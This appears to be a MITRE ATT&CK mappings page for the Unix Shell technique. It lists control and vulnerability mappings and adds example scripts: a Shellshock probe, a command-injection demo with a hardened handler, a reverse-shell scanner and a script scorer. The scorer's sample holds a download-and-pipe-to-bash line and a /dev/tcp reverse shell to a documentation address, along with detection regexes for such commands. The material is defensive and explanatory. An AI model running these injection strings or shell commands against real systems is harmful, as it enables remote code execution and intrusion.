T1059.004 Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.


NIST 800-53 Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
CM-06 Configuration Settings mitigates T1059.004 Unix Shell
AC-17 Remote Access mitigates T1059.004 Unix Shell
SI-16 Memory Protection mitigates T1059.004 Unix Shell
SI-10 Information Input Validation mitigates T1059.004 Unix Shell
SI-03 Malicious Code Protection mitigates T1059.004 Unix Shell
SI-07 Software, Firmware, and Information Integrity mitigates T1059.004 Unix Shell
CM-02 Baseline Configuration mitigates T1059.004 Unix Shell
SI-04 System Monitoring mitigates T1059.004 Unix Shell
AC-02 Account Management mitigates T1059.004 Unix Shell
AC-03 Access Enforcement mitigates T1059.004 Unix Shell
AC-06 Least Privilege mitigates T1059.004 Unix Shell

Known Exploited Vulnerabilities Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
CVE-2025-25257 Fortinet FortiWeb SQL Injection Vulnerability primary_impact T1059.004 Unix Shell
Comments
Affected versions of FortiWeb contain insufficient input sanitization, allowing an attacker to use SQL injection to write a malicious .pth file into FortiWeb's site-packages Python directory. Python processes .pth files in site-packages at interpreter start-up, so the attacker's code executes with the privileges of whatever Python process runs next. Because the underlying flaw is SQL injection, it can also lead to loss or exposure of data within the database.
CVE-2023-44221 SonicWall SMA100 Appliances OS Command Injection Vulnerability primary_impact T1059.004 Unix Shell
Comments
This post-authentication OS command injection vulnerability has been chained with CVE-2024-38475 (an Apache HTTP Server mod_rewrite flaw used to obtain access) to achieve command execution as the nobody user. SMA100 firmware versions below 10.2.1.10-62sv are affected.
CVE-2023-39780 ASUS RT-AX55 Routers OS Command Injection Vulnerability primary_impact T1059.004 Unix Shell
Comments
Attackers have gained access to affected ASUS routers through brute-force login attempts and authentication bypasses, then used this command injection to enable SSH and to persist a backdoor in NVRAM.
CVE-2022-20700 Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability primary_impact T1059.004 Unix Shell
Comments
This vulnerability is exploited by a remote attacker who sends specific commands to a router lacking sufficient authorization enforcement, allowing the attacker to gain root privileges and execute arbitrary commands on the system.
CVE-2022-20699 Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability primary_impact T1059.004 Unix Shell
Comments
This vulnerability is exploited by a remote, unauthenticated attacker "sending a specially crafted HTTP request to a vulnerable device that is acting as an SSL VPN Gateway." It is possible because of insufficient boundary checks when processing specific HTTP requests; successful exploitation grants the attacker root privileges.
CVE-2023-38831 RARLAB WinRAR Code Execution Vulnerability primary_impact T1059.004 Unix Shell
Comments
CVE-2023-38831 is a flaw in WinRAR's handling of crafted archives: when a user opens a seemingly legitimate document inside a malicious archive, WinRAR instead executes a file of the same name placed in a folder of the same name, giving the attacker arbitrary code execution via a specially prepared archive. There have been public reports of the FROZENLAKE, FROZENBARENTS, and ISLANDDREAMS spear-phishing campaigns leveraging this vulnerability.
CVE-2019-0708 Microsoft Remote Desktop Services Remote Code Execution Vulnerability primary_impact T1059.004 Unix Shell
Comments
CVE-2019-0708, also known as BlueKeep, is a remote code execution vulnerability in Windows Remote Desktop Services. It allows remote, unauthenticated attackers to run arbitrary code or cause a denial of service, and potentially to take control of vulnerable systems.
CVE-2014-7169 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability primary_impact T1059.004 Unix Shell
Comments
CVE-2014-7169 covers the incomplete initial fix for CVE-2014-6271 (Shellshock): after the first patch, Bash still mishandled function definitions imported from environment variables, so the same attack path remained open. A service that copies attacker-controlled request data into environment variables (for example a CGI web server setting HTTP_COOKIE or HTTP_USER_AGENT from request headers) and then spawns Bash lets the adversary execute arbitrary commands with the privileges of that service.
CVE-2014-6271 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability primary_impact T1059.004 Unix Shell
Comments
CVE-2014-6271 (Shellshock) is a flaw in how Bash imports function definitions from environment variables: a variable whose value began with "() {" was parsed as a function, and any commands following the closing brace were executed as soon as the shell started. Because services such as CGI web servers set environment variables (e.g. HTTP_COOKIE, HTTP_USER_AGENT) from attacker-controlled request headers before spawning a shell, an adversary can achieve remote code execution with the privileges of the parent process.
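The Shellshock path described in the two Bash entries above, as an added example that is not part of ATT&CK or this mappings page. It shows three things in order: that Bash genuinely ships functions to child shells through the environment (so the feature itself is legitimate), how to check whether the local Bash still executes commands appended to such a definition (using the widely published check string), and why a CGI web server was the entry point (the handler's environment is built from request headers). The function names are this example's own; the User-Agent value is constructed.

```sh
#!/bin/sh
# Added example, not from ATT&CK or the Mappings Explorer: the three pieces of
# the Shellshock path as separate functions. Function names are this example's.

# 1. Bash passes functions to child shells through the environment. Current
#    releases encode them as BASH_FUNC_<name>%% variables; the bug was that
#    unpatched releases treated *any* variable whose value began with "() {"
#    as a function and kept executing whatever followed the closing brace.
exported_function_demo() {
  command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
  bash -c 'greet() { echo "hello from an exported function"; }
           export -f greet
           env | grep -c "^BASH_FUNC_greet"     # 1: the definition rides in the environment
           bash -c greet'                        # the child shell imports it and runs it
}

# 2. Does the local bash still run code appended to a function definition?
#    This uses the widely published check string; on a fixed bash the variable
#    x is an ordinary string and only "probe" is printed.
shellshock_probe() {
  command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
  out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
  case $out in
    *vulnerable*) echo vulnerable ;;
    *)            echo patched ;;
  esac
}

# 3. Why a web server was the entry point: a CGI gateway copies request headers
#    into environment variables (User-Agent -> HTTP_USER_AGENT, Cookie ->
#    HTTP_COOKIE) and then runs the handler, so the attacker controls the
#    variable's value. Here the "handler" is just a shell that echoes "handled";
#    on an unpatched bash the injected command would run first.
cgi_like_dispatch() {
  header_value=$1
  handler_shell=sh
  if command -v bash >/dev/null 2>&1; then handler_shell=bash; fi
  HTTP_USER_AGENT="$header_value" "$handler_shell" -c 'echo handled'
}

# Standalone run.
exported_function_demo
echo "local bash: $(shellshock_probe)"
echo "request with a Shellshock-shaped User-Agent: $(cgi_like_dispatch '() { :;}; echo pwned')"
```

On a patched system the probe prints "patched" and the dispatch prints only "handled"; a result of "vulnerable" means the host's Bash predates the 2014 fixes and every service that execs a shell with request-derived environment variables is exposed. The same signature, a header value beginning with "() {", is what web server access logs should be searched for when looking for exploitation attempts.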
CVE-2016-10033 PHPMailer Command Injection Vulnerability primary_impact T1059.004 Unix Shell
CVE-2024-24919 Check Point Quantum Security Gateways Information Disclosure Vulnerability secondary_impact T1059.004 Unix Shell
Comments
CVE-2024-24919 is an information disclosure (arbitrary file read) vulnerability in Check Point's Quantum Security Gateway products. Attackers have been reported to use it to read files on the local file system, including sensitive data and the credentials of all local accounts, along with Active Directory credentials, SSH keys, and certificates.
CVE-2024-27443 Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability primary_impact T1059.004 Unix Shell
Comments
Attackers can send a malicious email with a specially crafted calendar header in order to execute arbitrary JavaScript in the recipient's browser.
CVE-2023-46604 Apache ActiveMQ Deserialization of Untrusted Data Vulnerability primary_impact T1059.004 Unix Shell
Comments
This vulnerability is exploited by a remote attacker who manipulates serialized class types in the OpenWire protocol to run arbitrary shell commands. The resulting remote code execution has been used to download and install malware such as Kinsing and cryptocurrency miners on Linux systems, and attackers have also attempted to deploy ransomware attributed to the HelloKitty family on target systems.
CVE-2021-36380 Sunhillo SureLine OS Command Injection Vulnerability primary_impact T1059.004 Unix Shell
Comments
To trigger this vulnerability, an attacker sends a specially crafted POST request to the web server at the URL /cgi/networkDiag.cgi, inserting a Linux command into the ipAddr or dnsAddr POST parameter. When the web server processes the request, the command embedded in the parameter is executed.
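The injection pattern behind the Sunhillo entry above, as an added example that is not Sunhillo's code. It models a networkDiag.cgi-style handler that receives an ipAddr value: first in the vulnerable shape, where the value is pasted into shell source text, then hardened with allow-list validation and argument passing. The function names, the hostile input and the use of echo in place of the real ping command are all this example's assumptions.

```sh
#!/bin/sh
# Added example, not Sunhillo's code: a networkDiag.cgi-style handler that
# takes an ipAddr parameter, first in the vulnerable shape, then hardened.

# Vulnerable shape: the parameter is pasted into shell source text, so ";",
# "|", "$(...)" and friends in the value are parsed as shell syntax.
# (echo stands in for the real "ping -c 1" so the example runs offline.)
diag_unsafe() {
  ip_addr=$1
  sh -c "echo pinging $ip_addr"
}

# Allow-list validation: only a dotted quad with octets 0-255 passes.
# Anything containing a character outside [0-9.] is rejected before any
# command is built, which covers every shell metacharacter.
validate_ipv4() {
  case $1 in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  IFS=. ; set -- $1 ; unset IFS          # split on dots, then restore default IFS
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Hardened shape: validate, then hand the value to the child as a positional
# parameter. The child shell never re-parses it as code.
diag_safe() {
  if ! validate_ipv4 "$1"; then
    echo "rejected: $1" >&2
    return 1
  fi
  sh -c 'echo pinging "$1"' networkDiag "$1"
}

# Standalone demonstration of both paths with the same hostile input.
hostile='10.0.0.1; echo INJECTED'
echo "unsafe handler:"; diag_unsafe "$hostile"
echo "safe handler:";   diag_safe "$hostile" || echo "(rejected, nothing ran)"
diag_safe 10.0.0.1
```

The unsafe handler prints INJECTED because the semicolon ends the echo command and starts a second one; the safe handler rejects the same string before building a command, and even a value that slipped past validation would reach the child only as "$1", never as code. Allow-listing the expected shape (here, an IPv4 address) is preferable to stripping known-bad characters, since the list of dangerous characters differs between shells and quoting contexts.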

VERIS Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
action.hacking.variety.Abuse of functionality Abuse of functionality. related-to T1059.004 Unix Shell

Azure Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
microsoft_sentinel Microsoft Sentinel technique_scores T1059.004 Unix Shell
Comments
The Microsoft Sentinel Hunting "Rare process running on a Linux host" query can identify uncommon shell usage that may be malicious.
alerts_for_linux_machines Alerts for Linux Machines technique_scores T1059.004 Unix Shell
Comments
This control may alert on suspicious command-line activity. Alerts may be generated on possible detection of shellcode usage on the command line, based on arguments, location, user, etc.
defender_for_app_service Microsoft Defender for Cloud: Defender for App Service technique_scores T1059.004 Unix Shell
Comments
This control monitors host data for potential reverse shells used for command and control. Temporal factor is unknown.
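An added example, not from Defender for App Service or ATT&CK, of what "monitors host data for potential reverse shells" can mean in practice on Linux, and of the interactive shell reached over a command and control channel that the technique description mentions: a shell whose standard streams are attached to a socket rather than a terminal. The pure check works on constructed fd listings so it runs anywhere; the live scan reads /proc. Function names and the socket inode numbers are this example's assumptions.

```sh
#!/bin/sh
# Added example (not from ATT&CK or Defender for App Service): flag shell
# processes whose standard streams are sockets, which is what a reverse shell
# started with `bash -i >& /dev/tcp/HOST/PORT 0>&1` or `nc -e /bin/sh` looks
# like from /proc. A shell a user is typing into has fds 0-2 on a pty instead.

# Pure check, testable offline: reads "fd target" lines on stdin (the same
# text `readlink /proc/PID/fd/N` produces) and succeeds only when fds 0, 1 and
# 2 all resolve to sockets.
std_streams_are_sockets() {
  awk '$1 ~ /^[012]$/ && $2 ~ /^socket:\[[0-9]+]$/ { n++ }
       END { if (n == 3) exit 0; exit 1 }'
}

# Emit the fd lines for one live pid, marking fds we cannot read.
fd_listing() {
  for fd in 0 1 2; do
    target=$(readlink "/proc/$1/fd/$fd" 2>/dev/null) || target=unreadable
    printf '%s %s\n' "$fd" "$target"
  done
}

# Live scan on Linux: print "pid comm target-of-fd-0" for every shell whose
# standard streams are sockets. Reading another user's /proc/PID/fd needs
# root (or ptrace access), so run as root for full coverage.
scan_proc_for_socket_shells() {
  for pid_dir in /proc/[0-9]*; do
    pid=${pid_dir#/proc/}
    comm=$(cat "$pid_dir/comm" 2>/dev/null) || continue
    case $comm in sh|bash|dash|zsh|ksh|ash) ;; *) continue ;; esac
    if fd_listing "$pid" | std_streams_are_sockets; then
      echo "$pid $comm $(readlink "$pid_dir/fd/0")"
    fi
  done
  return 0
}

# Constructed fd listings (the inode numbers are made up) for the two cases.
sample_reverse_shell_fds() {
  printf '0 socket:[48121]\n1 socket:[48121]\n2 socket:[48121]\n'
}
sample_interactive_shell_fds() {
  printf '0 /dev/pts/0\n1 /dev/pts/0\n2 /dev/pts/0\n'
}

# Standalone run: the constructed cases, then whatever the live scan finds.
sample_reverse_shell_fds     | std_streams_are_sockets && echo "constructed reverse shell: flagged"
sample_interactive_shell_fds | std_streams_are_sockets || echo "constructed interactive shell: not flagged"
scan_proc_for_socket_shells
```

Two caveats a practitioner should keep in mind. A pipe-based reverse shell such as `sh -i 2>&1 | nc HOST PORT` puts pipes, not sockets, on the shell's streams, so that variant needs a check on the parent that owns the socket. And a shell legitimately spawned by an inetd-style service also has sockets on fds 0-2, so treat a hit as a lead to be confirmed against the peer address (from /proc/net/tcp) rather than as proof on its own.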

GCP Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
security_command_center Security Command Center technique_scores T1059.004 Unix Shell
Comments
SCC uses machine learning (NLP techniques) to evaluate the content of an executed bash script. This protects against potentially malicious scripts used to execute commands on compromised systems. Because of the high threat detection coverage provided by the ML model and the near-real-time temporal factor, this control was graded as significant.
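An added example, not Security Command Center's model, of what evaluating the content of an executed bash script involves at the simplest level: a rule-based scorer over the indicators an analyst looks for (download-and-pipe-to-shell, /dev/tcp connections, executables dropped in world-writable directories, history tampering, persistence edits). An ML classifier learns weightings like these from data instead of having them hand-assigned; the scores, thresholds, function names and the three sample scripts below are all this example's constructions, and 198.51.100.7 is a documentation address.

```sh
#!/bin/sh
# Added example: a rule-based stand-in for "evaluate the content of an
# executed bash script". Not SCC's model; the indicators and weights are
# this example's own.

# Reads a script on stdin; prints "<score> <indicator> <indicator> ...".
script_indicators() {
  awk '
    /(curl|wget)[^|]*[|][ \t]*(ba)?sh/                                     { s += 3; h = h " download-and-pipe" }
    /base64[ \t]+(-d|--decode)[^|]*[|][ \t]*(ba)?sh/                        { s += 3; h = h " base64-decode-and-pipe" }
    /\/dev\/tcp\//                                                          { s += 3; h = h " dev-tcp" }
    /(^|[ \t;|&])(nc|ncat|netcat)[ \t]+.*[ \t]-[ec][ \t]/                   { s += 3; h = h " nc-exec" }
    /chmod[ \t]+([+]x|[0-7]*7[0-7]*)[ \t]+\/(tmp|dev\/shm|var\/tmp)\//       { s += 2; h = h " exec-in-tmp" }
    /unset[ \t]+HISTFILE|history[ \t]+-c|HISTSIZE=0/                        { s += 2; h = h " history-tamper" }
    /crontab[ \t]+-|\/etc\/cron|rc\.local/                                  { s += 1; h = h " persistence" }
    END { print (s + 0) h }
  '
}

# Reads a script on stdin; prints malicious / suspicious / benign.
classify_script() {
  score=$(script_indicators | cut -d' ' -f1)
  if   [ "$score" -ge 6 ]; then echo malicious
  elif [ "$score" -ge 3 ]; then echo suspicious
  else                          echo benign
  fi
}

# Constructed samples. The first is the shape of a typical dropper; the last
# is a legitimate health check that uses /dev/tcp and therefore scores as
# suspicious, the false-positive class any content scorer has to tolerate.
sample_malicious_script() {
  cat <<'EOF'
#!/bin/bash
unset HISTFILE
curl -s http://198.51.100.7/x.sh | bash
bash -i >& /dev/tcp/198.51.100.7/4444 0>&1
chmod +x /tmp/.x && /tmp/.x
EOF
}
sample_benign_script() {
  cat <<'EOF'
#!/bin/sh
set -eu
for f in /var/log/app/*.log; do
  gzip -k "$f"
done
EOF
}
sample_borderline_script() {
  cat <<'EOF'
#!/bin/bash
# health check: open a raw TCP connection and send an HTTP request
exec 3<>/dev/tcp/127.0.0.1/8080
printf 'GET /healthz HTTP/1.0\r\n\r\n' >&3
EOF
}

# Standalone run over the three samples.
for s in malicious benign borderline; do
  printf '%-10s %s -> %s\n' "$s" "$(sample_${s}_script | script_indicators)" "$(sample_${s}_script | classify_script)"
done
```

The point of the borderline sample is that content alone is ambiguous: the same /dev/tcp construct appears in droppers and in monitoring scripts, which is why a hosted control combines the script text with who ran it, from where, and how often that process normally appears, and why a hand-written scorer like this one is a triage aid rather than a verdict.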

AWS Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
aws_web_application_firewall AWS Web Application Firewall technique_scores T1059.004 Unix Shell
Comments
AWS WAF protects web applications from injection attacks that target command and scripting interpreters. It does so through the following managed rule groups, which block malicious traffic aimed at a variety of operating systems and applications: AWSManagedRulesCommonRuleSet, AWSManagedRulesSQLiRuleSet, AWSManagedRulesUnixRuleSet, AWSManagedRulesWindowsRuleSet, AWSManagedRulesPHPRuleSet and AWSManagedRulesWordPressRuleSet. This is given a score of Significant because it provides protection for PowerShell, Unix, and JavaScript command and scripting interpreters by blocking the malicious content in near real-time.